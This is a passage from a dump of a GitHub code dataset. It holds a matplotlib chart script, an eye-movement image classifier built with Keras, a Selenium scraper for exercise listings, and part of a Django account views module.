"js.py", "file_name": "js.py", "file_ext": "py", "file_size_in_byte": 841, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "31631709611", "text": "# -*- coding: utf-8 -*-\r\nimport numpy as np \r\n\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib import mlab\r\nfrom matplotlib.ticker import MultipleLocator, FormatStrFormatter \r\nfrom pylab import * \r\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei']\r\nmatplotlib.rcParams['font.family']='sans-serif'\r\n\r\nfont = {'family' : 'sans-serif', \r\n 'color' : 'darkred', \r\n 'weight' : 'normal', \r\n 'size' : 12, \r\n } \r\nfont_text = {'family' : 'sans-serif', \r\n 'color' : 'darkred', \r\n 'weight' : 'normal', \r\n 'size' : 10, \r\n }\r\nfig, ax = plt.subplots()\r\n\r\nY = [0.96, 0.97, 0.80, 0.82, 0.81, 0.83]\r\nX = np.arange(len(Y))\r\nplt.bar(X, Y, width = 0.5, facecolor = 'lightskyblue')\r\n# plt.bar(X + 0.36,Y2, width = 0.35, facecolor = 'yellowgreen', label=\"Our method\")\r\n# 水平柱状图plt.barh,属性中宽度width变成了高度height\r\n# 打两组数据时用+\r\n# facecolor柱状图里填充的颜色\r\n# edgecolor是边框的颜色\r\n# 想把一组数据打到下边,在数据前使用负号\r\n# plt.bar(X, -Y2, width=width, facecolor='#ff9999', edgecolor='white')\r\n# 给图加text\r\nlabel = [\"文本\", \"图片\", \"发送红包\", \"接收红包\", \"发送转账\", \"接收转账\"]\r\nfor x,y in zip(X,Y):\r\n plt.text(x, y+0.01, '%.2f' % y, ha='center', va= 'bottom', fontdict=font_text)\r\n# for x,y in zip(X,Y2):\r\n# plt.text(x+0.35, y, '%.2f' % y, ha='center', va= 'bottom', fontdict=font_text)\r\n\r\nplt.legend(loc='upper left') # , bbox_to_anchor=(0.9,0.1)\r\nplt.xticks(range(len(Y)), label)\r\nplt.ylim(0,+1.05)\r\nplt.xlabel('微信用户行为', fontdict=font)\r\nplt.ylabel('准确率', fontdict=font)\r\nplt.savefig(\"dialog_acc.jpg\")\r\n# plt.ylabel('召回率', fontdict=font)\r\n# plt.savefig(\"dialog_rec.jpg\")\r\n# plt.ylabel('F1值', fontdict=font)\r\n# plt.savefig(\"dialog_f1.jpg\")", "repo_name": "yfp16/WeChat", "sub_path": "paper.py", "file_name": "paper.py", "file_ext": "py", "file_size_in_byte": 1835, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "matplotlib.rcParams", "line_number": 8, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 9, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "25420332774", "text": "import os\nimport numpy as np\nimport shutil\nimport cv2\nfrom google.colab.patches import cv2_imshow\n\n#DATASET PARTITIONING\n\nroot_dir='resized eyes'\ncentreposCls = '/resizedcentreimages' \nleftposCls = '/resizedleftimages' \nrightposCls = '/resizedrightimages' \n\nos.makedirs('Train'+ centreposCls)\nos.makedirs('Train'+ leftposCls)\nos.makedirs('Train'+ rightposCls)\nos.makedirs('Validation'+ centreposCls)\nos.makedirs('Validation'+ leftposCls)\nos.makedirs('Validation'+ rightposCls)\nos.makedirs('Test'+ centreposCls)\nos.makedirs('Test'+ leftposCls)\nos.makedirs('Test'+ rightposCls)\n\nos.makedirs('Train1'+ centreposCls)\nos.makedirs('Train1'+ leftposCls)\nos.makedirs('Train1'+ rightposCls)\nos.makedirs('Validation1'+ centreposCls)\nos.makedirs('Validation1'+ leftposCls)\nos.makedirs('Validation1'+ rightposCls)\nos.makedirs('Test1'+ centreposCls)\nos.makedirs('Test1'+ leftposCls)\nos.makedirs('Test1'+ rightposCls)\n\n\ncurrentCls=centreposCls\nsrc='/content/drive/My Drive/FINAL2'+currentCls \nallImageNames=os.listdir(src) \nnp.random.shuffle(allImageNames)\ntraining_imagenames,validation_imagenames,test_imagenames=np.split(np.array(allImageNames),\n\t\t\t\t[int(len(allImageNames)*0.8),int(len(allImageNames)*0.9)])\ntraining_imagenames=[src+'/'+ name for name in training_imagenames.tolist()] \nvalidation_imagenames=[src+'/'+ name for name in validation_imagenames.tolist()]\ntest_imagenames=[src+'/'+ name for name in test_imagenames.tolist()]\nprint('Total images:',len(allImageNames))\nprint('Training:',len(training_imagenames))\nprint('Validation:',len(validation_imagenames))\nprint('Testing:',len(test_imagenames))\n\nfor name in training_imagenames:\n shutil.copy(name,'Train/'+ currentCls)\nfor name in validation_imagenames:\n shutil.copy(name,'Validation/'+ currentCls)\nfor name in test_imagenames:\n shutil.copy(name,'Test/'+ currentCls)\n\ncurrentCls=leftposCls\nsrc='/content/drive/My Drive/FINAL2'+currentCls \nallImageNames=os.listdir(src) \nnp.random.shuffle(allImageNames) \ntraining_imagenames,validation_imagenames,test_imagenames=np.split(np.array(allImageNames),\n\t\t\t\t[int(len(allImageNames)*0.8),int(len(allImageNames)*0.9)])\ntraining_imagenames=[src+'/'+ name for name in training_imagenames.tolist()] \nvalidation_imagenames=[src+'/'+ name for name in validation_imagenames.tolist()]\ntest_imagenames=[src+'/'+ name for name in test_imagenames.tolist()]\n\nprint('Total images:',len(allImageNames))\nprint('Training:',len(training_imagenames))\nprint('Validation:',len(validation_imagenames))\nprint('Testing:',len(test_imagenames))\n\nfor name in training_imagenames:\n shutil.copy(name,'Train/'+ currentCls)\nfor name in validation_imagenames:\n shutil.copy(name,'Validation/'+ currentCls)\nfor name in test_imagenames:\n shutil.copy(name,'Test/'+ currentCls)\n\n\ncurrentCls=rightposCls\nsrc='/content/drive/My Drive/FINAL2/resizedrightimages'\nallImageNames=os.listdir(src) \nnp.random.shuffle(allImageNames) \ntraining_imagenames,validation_imagenames,test_imagenames=np.split(np.array(allImageNames),\n\t\t\t\t[int(len(allImageNames)*0.8),int(len(allImageNames)*0.9)])\ntraining_imagenames=[src+'/'+ name for name in training_imagenames.tolist()]\nvalidation_imagenames=[src+'/'+ name for name in validation_imagenames.tolist()]\ntest_imagenames=[src+'/'+ name for name in test_imagenames.tolist()]\n\nprint('Total images:',len(allImageNames))\nprint('Training:',len(training_imagenames))\nprint('Validation:',len(validation_imagenames))\nprint('Testing:',len(test_imagenames))\n\nfor name in training_imagenames:\n shutil.copy(name,'Train/'+ currentCls)\nfor name in validation_imagenames:\n shutil.copy(name,'Validation/'+ currentCls)\nfor name in test_imagenames:\n shutil.copy(name,'Test/'+ currentCls)\n\n\n\ndirectory = '/content/Train/resizedcentreimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50)) \n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Train1/resizedcentreimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Train/resizedleftimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Train1/resizedleftimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Train/resizedrightimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Train1/resizedrightimages/' + file + '_hist.jpg', equ)\n\n \ndirectory = '/content/Validation/resizedcentreimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0) \n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Validation1/resizedcentreimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Validation/resizedrightimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0) \n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Validation1/resizedrightimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Validation/resizedleftimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Validation1/resizedleftimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Test/resizedrightimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0) \n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Test1/resizedrightimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Test/resizedleftimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Test1/resizedleftimages/' + file + '_hist.jpg', equ)\n\n\ndirectory = '/content/Test/resizedcentreimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Test1/resizedcentreimages/' + file + '_hist.jpg', equ)\n\n\n#MODEL CREATION AND TRAINING\n\nimport keras\nfrom keras.models import Sequential, Model\nfrom keras.layers import Conv2D, MaxPooling2D, Input\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\n\n\nlenet = Sequential()\nlenet.add(Conv2D(24, kernel_size=(7, 7), activation='relu',\n input_shape=(50,50,3)))\nlenet.add(MaxPooling2D(pool_size=(2, 2)))\nlenet.add(Conv2D(24, (5, 5), activation='relu'))\nlenet.add(MaxPooling2D(pool_size=(2, 2)))\nlenet.add(Conv2D(24, (3, 3), activation='relu'))\nlenet.add(MaxPooling2D(pool_size=(2, 2)))\nlenet.add(Flatten())\nlenet.add(Dense(500, activation='relu'))\nlenet.add(Dense(3, activation='softmax'))\n\nSVG(model_to_dot(lenet,show_shapes=True, show_layer_names=False\n ).create(prog='dot', format='svg'))\nlenet.summary()\nlenet.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\n\n\n\nfrom keras.preprocessing.image import ImageDataGenerator \ntrain_datagen=ImageDataGenerator(rescale=1/255,\n shear_range=0.2,\n zoom_range=0.2,\n brightness_range=[0.2,1.0],\n vertical_flip=True)\n\n\nvalidation_datagen=ImageDataGenerator(rescale=1/255)\ntest_datagen = ImageDataGenerator(rescale=1/255)\nbatchSize=5\ntraining_set=train_datagen.flow_from_directory( \n '/content/Train1',\n target_size=(50,50),\n batch_size=batchSize,\n class_mode='categorical')\nvalidation_set=validation_datagen.flow_from_directory( \n '/content/Validation1',\n target_size=(50,50),\n batch_size=batchSize,\n class_mode='categorical')\ntest_set = test_datagen.flow_from_directory(\n '/content/Test1',\n target_size=(50,50),\n batch_size=batchSize,\n class_mode='categorical')\nstepsnumperepochtraining=int(408/batchSize)\nstepsnumperepochvalidation=int(59/batchSize)\nstepsnumperepochtesting = int(118/batchSize)\nhistory = lenet.fit_generator( \n training_set,\n steps_per_epoch = stepsnumperepochtraining,\n epochs = 50,\n validation_data = validation_set,\n validation_steps = stepsnumperepochvalidation)\n\nlenet.save('eyeprojectmodel2.h5')\nfrom shutil import copyfile\ncopyfile('/content/eyeprojectmodel2.h5','/content/drive/My Drive/eyeprojectmodel/projectmodel2.h5') \n\n\n\n\n\n \n\n", "repo_name": "nimithathankachan/Eye-movement-classification-in-video", "sub_path": "3classmodelcreation/LEFTRIGHTCENTREMODELCREATION AND TRAINING.py", "file_name": "LEFTRIGHTCENTREMODELCREATION AND TRAINING.py", "file_ext": "py", "file_size_in_byte": 9151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.makedirs", "line_number": 14, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 15, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 16, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 17, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 19, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 20, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 21, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 25, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 27, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 28, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 29, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 30, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 31, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 32, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.split", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 50, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 52, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 54, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.split", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 72, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 74, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 76, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.split", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 95, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 97, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 99, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 106, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 107, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 109, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 116, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 118, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 124, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 125, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 126, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 127, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 133, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 134, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 136, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 142, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 143, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 145, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 153, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 154, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 160, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 161, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 162, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 163, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 169, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 170, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 171, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 172, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path", "line_number": 177, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 178, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 179, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 180, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 181, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 194, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 195, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 197, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 198, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 199, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 200, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 201, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 202, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 203, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 204, "usage_type": "call"}, {"api_name": "IPython.display.SVG", "line_number": 206, "usage_type": "call"}, {"api_name": "keras.utils.vis_utils.model_to_dot", "line_number": 206, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 214, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 221, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 222, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 251, "usage_type": "call"}]} +{"seq_id": "37572488534", "text": "#Exercises\r\n #Type\r\n #Muscles\r\n #Equipment\r\n #Level (varchar)\r\n #images (varchar)\r\n #Review/Rating (varchar)\r\n #Instructions (varchar)\r\n #Image1\r\n #Image2\r\n#plan\r\n #Go through all muscle groups\r\n #Click each exercise\r\n\r\n\r\ndef scrape(muscleID):\r\n\r\n from selenium import webdriver\r\n\r\n baseUrl = \"https://www.bodybuilding.com/exercises/finder/?muscleid=\"\r\n # change to your browser and location of your driver\r\n driver = webdriver.Chrome(executable_path=\"/Users/Nickp/Desktop/chromedriver.exe\")\r\n driver.set_page_load_timeout(5)\r\n\r\n try:\r\n driver.get(baseUrl + str(muscleID))\r\n except:#timeout\r\n pass\r\n\r\n \"\"\"\r\n muscleGroups = driver.find_element_by_xpath(\"//section[@class='ExCategory-formSection']\").find_element_by_css_selector('ul').find_elements_by_css_selector('li')\r\n for muscle in muscleGroups:\r\n muscle.find_element_by_css_selector('label').click()\r\n \"\"\"\r\n\r\n for i in range(0, 1):\r\n try:\r\n nextButton = driver.find_element_by_css_selector(\".bb-flat-btn.bb-flat-btn--size-lg.bb-spinner-btn.js-ex-loadMore.ExLoadMore-btn\").click()\r\n except:\r\n break\r\n exercises = driver.find_elements_by_xpath(\"//h3[@class='ExHeading ExResult-resultsHeading']\")\r\n exerciseUrls = [\"\" for exercise in range(len(exercises))]\r\n for i in range(len(exercises)):\r\n exerciseUrls[i] = exercises[i].find_element_by_css_selector('a').get_attribute('href')\r\n\r\n exerciseName = [\"\" for url in range(len(exerciseUrls))]\r\n types = [\"\" for url in range(len(exerciseUrls))]\r\n muscleWorked = [\"\" for url in range(len(exerciseUrls))]\r\n equipment = [\"\" for url in range(len(exerciseUrls))]\r\n level = [\"\" for url in range(len(exerciseUrls))]\r\n instructions = [\"\" for url in range(len(exerciseUrls))]\r\n rating = [\"\" for url in range(len(exerciseUrls))]\r\n imageOne = [\"\" for url in range(len(exerciseUrls))]\r\n imageTwo = [\"\" for url in range(len(exerciseUrls))]\r\n\r\n for i in range(len(exerciseUrls)):\r\n try:\r\n driver.get(exerciseUrls[i])\r\n exerciseName[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[1]/div[1]/h2\").get_attribute(\"innerHTML\")\r\n exerciseName[i] = exerciseName[i].strip()\r\n types[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[2]/div[2]/ul/li[1]/a\").get_attribute(\"innerHTML\")\r\n types[i] = types[i].strip()\r\n muscleWorked[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[2]/div[2]/ul/li[2]/a\").get_attribute(\"innerHTML\")\r\n muscleWorked[i] = muscleWorked[i].strip()\r\n equipment[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[2]/div[2]/ul/li[3]/a\").get_attribute(\"innerHTML\")\r\n equipment[i] = equipment[i].strip()\r\n level[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[2]/div[2]/ul/li[4]\").get_attribute(\"innerHTML\")\r\n level[i] = level[i].replace('Level:', \"\") #formatting\r\n level[i] = level[i].strip()\r\n rating[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[2]/div[3]/div/div[1]\").get_attribute(\"innerHTML\")\r\n rating[i] = rating[i].strip()\r\n imageOne[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[3]/div[1]/div[1]/img\").get_attribute(\"src\")\r\n imageTwo[i] = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[3]/div[1]/div[2]/img\").get_attribute(\"src\")\r\n instructionList = driver.find_element_by_xpath(\"//*[@id='js-ex-content']/div/section[4]/div/div[2]/ol\")\r\n instructionList = instructionList.find_elements_by_tag_name(\"li\")\r\n x = 1 ##instruction number\r\n for j in range(len(instructionList)):\r\n instructions[i] += \" \" + str(x) + \". \" + instructionList[j].text\r\n x += 1\r\n\r\n \"\"\" ##might not want to include\r\n if(driver.find_elements_by_xpath(\"//*[contains(text(),'Caution:')]\").__sizeof__() > 0):\r\n caution[i] = driver.find_element_by_xpath(\"//*[contains(text(),'Caution:')]\").find_element_by_xpath(\"..\").get_attribute(\"innerHTML\")\r\n caution[i] = caution[i].replace(\"<strong>Caution:</strong> \", \"\") #formating\r\n \r\n if(driver.find_elements_by_xpath(\"//*[contains(text(),'Variations:')]\").__sizeof__() > 0):\r\n variations[i] = driver.find_element_by_xpath(\"//*[contains(text(),'Variations:')]\").find_element_by_xpath(\"..\").get_attribute(\"innerHTML\")\r\n variations[i] = variations[i].replace(\"<strong>Variations:</strong>\" , \"\") #formating\r\n \"\"\"\r\n\r\n except:#timeout\r\n pass\r\n\r\n\r\n\r\n sqlFile = open(\"file.txt\", \"a+\")\r\n for i in range(len(exerciseUrls)):\r\n sqlFile.write(exerciseName[i] + \"\\t\")\r\n sqlFile.write(muscleWorked[i] + \"\\t\")\r\n sqlFile.write(equipment[i] + \"\\t\")\r\n sqlFile.write(level[i] + \"\\t\")\r\n sqlFile.write(rating[i] + \"\\t\")\r\n sqlFile.write(instructions[i] + \"\\t\")\r\n sqlFile.write(imageOne[i] + \"\\t\")\r\n sqlFile.write(imageTwo[i] + \"\\n\")\r\n\r\n sqlFile.close()\r\n\r\n driver.quit();\r\n", "repo_name": "swole-goals/SwoleGoals", "sub_path": "scraping/scraping.py", "file_name": "scraping.py", "file_ext": "py", "file_size_in_byte": 5270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "74744849883", "text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import View\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.hashers import make_password,check_password\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.urls import reverse_lazy\nfrom django.contrib import messages\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom account.tasks import send_confirmation_mail\nfrom django.utils.encoding import force_str\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.utils.translation import gettext_lazy as _\nfrom .tokens import account_activation_token\nfrom .forms import RegisterForm, ProfileForm\nfrom product.models import Variant, Image\nfrom .models import User, WishList\nfrom payment.models import Cart\n\n# Create your views here.\n\n# def forget_pwd(request):\n# email = request.GET.get('email', \"\")\n# user = User.objects.filter(email=email).first()\n# if user:\n# send_confirmation_mail(user=user, current_site=get_current_site(request))\n\n# return render(request, 'forget_pwd.html')\n\n\ndef sign_in(request):\n if request.user.is_authenticated:\n return redirect(reverse_lazy('account:profile'))\n else:\n error = ''\n if request.method == \"POST\":\n if '@' in request.POST['emailorusername']:\n email = request.POST['emailorusername']\n if User.objects.filter(email=email):\n username = User.objects.get(email=email).username\n else: username=None\n else:\n username = request.POST['emailorusername']\n if User.objects.filter(username=username):\n username = request.POST['emailorusername']\n else: username=None\n password = request.POST['password']\n user = authenticate(request, username = username, password = password)\n if user is not None: \n login(request,user)\n messages.add_message(request, messages.SUCCESS, f\"{('Welcome')} {str(username).upper()}!\")\n return redirect(reverse_lazy(\"core:home\"))\n else: error=('Email or username or password wrong')\n \n return render(request,'login.html', context={'error':error})\n\n\n@login_required()\ndef profile(request):\n if request.method == 'POST':\n\n form = ProfileForm(request.POST)\n if form.is_valid():\n profile = form.save(commit=False)\n profile.country = request.POST.get('selected_country')\n profile.save()\n return redirect(reverse_lazy(\"core:home\"))\n else:\n form = ProfileForm()\n\n \n context = {\n 'form': form\n }\n\n return render(request, 'profile.html', context)\n\n\ndef sign_up(request):\n if request.user.is_authenticated:\n return redirect(reverse_lazy('account:profile'))\n else:\n form = RegisterForm()\n if request.method == \"POST\":\n form = 